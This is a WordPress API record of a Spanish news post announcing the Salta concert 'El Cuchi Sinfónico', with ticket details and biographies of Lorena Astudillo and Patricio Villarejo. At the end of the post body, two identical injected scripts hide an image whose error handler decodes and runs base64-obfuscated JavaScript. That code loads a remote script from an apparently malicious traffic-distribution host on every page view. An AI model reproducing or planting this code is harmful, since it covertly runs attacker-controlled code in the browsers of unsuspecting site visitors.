{"id":5252,"date":"2025-06-11T10:27:01","date_gmt":"2025-06-11T13:27:01","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5252"},"modified":"2025-08-13T23:30:07","modified_gmt":"2025-08-14T02:30:07","slug":"el-cuchi-sinfonico-se-presentara-el-sabado-en-el-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5252","title":{"rendered":"\u00abEl Cuchi Sinf\u00f3nico\u00bb se presentar\u00e1 el s\u00e1bado en el Teatro Provincial"},"content":{"rendered":"\n<p><strong><em>Las creaciones de Gustavo Leguizam\u00f3n muestran una vez m\u00e1s su eterna vigencia con el espect\u00e1culo que se presentar\u00e1 el s\u00e1bado 14 de junio en el Teatro Provincial Juan Carlos Saravia, con la cantante Lorena Astudillo y la direcci\u00f3n de Patricio Villarejo.<\/em><\/strong><\/p>\n\n\n\n<p>S\u00edmbolo de la mejor tradici\u00f3n musical salte\u00f1a, Gustavo \u201cCuchi\u201d Leguizam\u00f3n ser\u00e1 homenajeado el pr\u00f3ximo s\u00e1bado, 14 de junio, con un concierto de alt\u00edsimo nivel en el Teatro Provincial Juan Carlos Saravia. El espect\u00e1culo, denominado \u201cEl Cuchi Sinf\u00f3nico\u201d, comenzar\u00e1 a las 21 horas y contar\u00e1 con el protagonismo de la cantante Lorena Astudillo y el director Patricio Villarejo, quienes en 2017 presentaron \u201cEl Cuchi de C\u00e1mara\u201d y ahora llegan a nuestra ciudad con esta nueva propuesta, estelarizada por la participaci\u00f3n de la Orquesta Sinf\u00f3nica de Salta.<\/p>\n\n\n\n<p>El repertorio, con arreglos orquestales del propio Villarejo, incluye los grandes cl\u00e1sicos del Cuchi, como El Silbador, La Pome\u00f1a, La Arenosa, Chacarera del Expediente, Coplas a Tata Dios, Zamba del Laurel, Juan del Monte y Balderrama, entre otras.<\/p>\n\n\n\n<p>\u201cLa m\u00fasica cl\u00e1sica y el folklore argentino se encuentran con enorme belleza y emoci\u00f3n para homenajear a uno de nuestros m\u00e1s grandes creadores\u201d, dice al respecto el director invitado. Y Lorena Astudillo agrega: \u201cVamos a honrar al maestro y recrearlo con todo el amor y admiraci\u00f3n que merece. Cantar al Cuchi en Salta y en tama\u00f1a compa\u00f1\u00eda es un honor y una felicidad infinitos\u201d.<\/p>\n\n\n\n<p>Las entradas ya est\u00e1n a la venta, con tres valores: $10.000 para las filas 1 a 15 de la platea y el palco completo; $8000 para las filas 16 a 26 de la platea; y $6000 para pullman y superpullman. Se pueden adquirir a trav\u00e9s de la plataforma digital Salta Ticket (www.saltaticket.gob.ar) y en las boleter\u00edas del teatro, Zuvir\u00eda 70, frente a la plaza 9 de Julio. Como es habitual, habr\u00e1 entradas gratuitas para jubilados y estudiantes, con un cupo limitado.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17841-el-cuchi-sinfonico-se-presentara-el-sabado-en-el-teatro-provincial.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17841-el-cuchi-sinfonico-se-presentara-el-sabado-en-el-teatro-provincial.webp\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<p><strong>Sobre Lorena Astudillo<\/strong><\/p>\n\n\n\n<p><strong>Lorena Astudillo<\/strong>&nbsp;es una de las m\u00e1s destacadas cantantes y compositoras de la m\u00fasica de ra\u00edz folcl\u00f3rica argentina. Lic en Psicolog\u00eda y docente de canto.<\/p>\n\n\n\n<p>Tiene un camino art\u00edstico exitoso de casi 30 a\u00f1os.<\/p>\n\n\n\n<p>Produjo y edit\u00f3 8 discos, varios de ellos con obras de propia autor\u00eda tanto en m\u00fasica como en poes\u00eda.<\/p>\n\n\n\n<p>Dicta Talleres vivenciales de CANTO INTEGRACI\u00d3N \u00a9 un m\u00e9todo creado por ella donde confluyen sus saberes y experiencias como Lic en Psicolog\u00eda, artista y docente. Estos talleres est\u00e1n destinados a m\u00fasicos, artistas de diversas disciplinas y p\u00fablico en general que desea conectarse con la propia voz, con su creatividad y con la capacidad de \u201cexpresarse\u201d genuinamente a trav\u00e9s del canto. Adem\u00e1s de los recursos t\u00e9cnicos de la voz y los conocimientos musicales el Canto Integraci\u00f3n busca abrir el camino del autoconocimiento y de la percepci\u00f3n m\u00e1s integrada de s\u00ed mismo y del mundo que nos rodea.<\/p>\n\n\n\n<p>Se ha presentado en las salas m\u00e1s importantes de Buenos Aires (Sala sinf\u00f3nica de la Usina del Arte, La Ballena azul y Sala argentina del CCK, Nd Ateneo, La Trastienda, Gran Rex y otras grandes salas de teatros provinciales de Argentina) tanto con sus proyectos personales como artista invitada de grandes orquestas sinf\u00f3nicas y de c\u00e1mara.<\/p>\n\n\n\n<p>Premio Konex 2015 como mejor cantante femenina de folclore. &nbsp;Nominada en varias oportunidades a los premios Gardel por tres de sus discos, como \u201cMejor \u00e1lbum artista femenina de folclore\u201d y a los premios Clar\u00edn en el rubro \u201cRevelaci\u00f3n Folclore\u201d<\/p>\n\n\n\n<p><strong>Sobre Patricio Villarejo<\/strong><\/p>\n\n\n\n<p>Ha participado en innumerables proyectos de folklore, tango, jazz, rock, pop con artistas nacionales e internacionales. Con su violonchelo ha sido actor de escenarios como el que compartieran Pugliese y Piazzolla en Amsterdam, Holanda, en 1991, la compa\u00f1\u00eda \u201cForever Tango\u201d, la orquesta de Horacio Salg\u00e1n, la New Blood Orchestra acompa\u00f1ando a Peter Gabriel en su tour por Latinoam\u00e9rica.<\/p>\n\n\n\n<p>Charly Garc\u00eda en el Col\u00f3n, quien bautiz\u00f3 a su Orquesta Kashmir, que actualmente acompa\u00f1a a Pedro Aznar. Como director musical, arreglador e int\u00e9rprete ha participado en producciones junto a Andr\u00e9s Calamaro, Fito P\u00e1ez, Sandra Mihanovich, Diego Torres, Alejandro Lerner, Mercedes Sosa y Julieta Venegas entre otros grandes artistas.<\/p>\n\n\n\n<p>Ha sido nominado al Grammy latino en varias oportunidades y ha recibido el premio en cinco producciones discogr\u00e1ficas con artistas como Fernando Otero, Cecilia Etchenique, Eva Ayll\u00f3n, Pedro Aznar, etc. Mientras presenta sus anteriores trabajos, \u201cDesde alg\u00fan lugar\u201d, editado por Melopea Discos, y el siguiente, \u201cIdentidad\u201d, donde recorre sus influencias, con invitados tales como Pedro Aznar, Peteco Carabajal y Franco Luciani, est\u00e1 en proceso de grabar un nuevo \u00e1lbum: \u201cPlaylist\u201d, con invitados especiales como Elena Roger, Peteco Carabajal y Lula Bertoldi.<\/p>\n\n\n\n<p>Patricio Villarejo es artista D&#8217;ADDARIO.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17842-el-cuchi-sinfonico-se-presentara-el-sabado-en-el-teatro-provincial.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/17842-el-cuchi-sinfonico-se-presentara-el-sabado-en-el-teatro-provincial.webp\" alt=\"\"\/><\/a><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las creaciones de Gustavo Leguizam\u00f3n muestran una vez m\u00e1s su eterna vigencia con el espect\u00e1culo que se presentar\u00e1 el s\u00e1bado 14 de junio en el Teatro Provincial Juan Carlos Saravia, con la cantante Lorena Astudillo y la direcci\u00f3n de Patricio Villarejo. S\u00edmbolo de la mejor tradici\u00f3n musical salte\u00f1a, Gustavo \u201cCuchi\u201d Leguizam\u00f3n ser\u00e1 homenajeado el pr\u00f3ximo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5253,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-5252","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5252"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5252"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5252\/revisions"}],"predecessor-version":[{"id":6463,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5252\/revisions\/6463"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5253"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5252"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5252"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5252"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}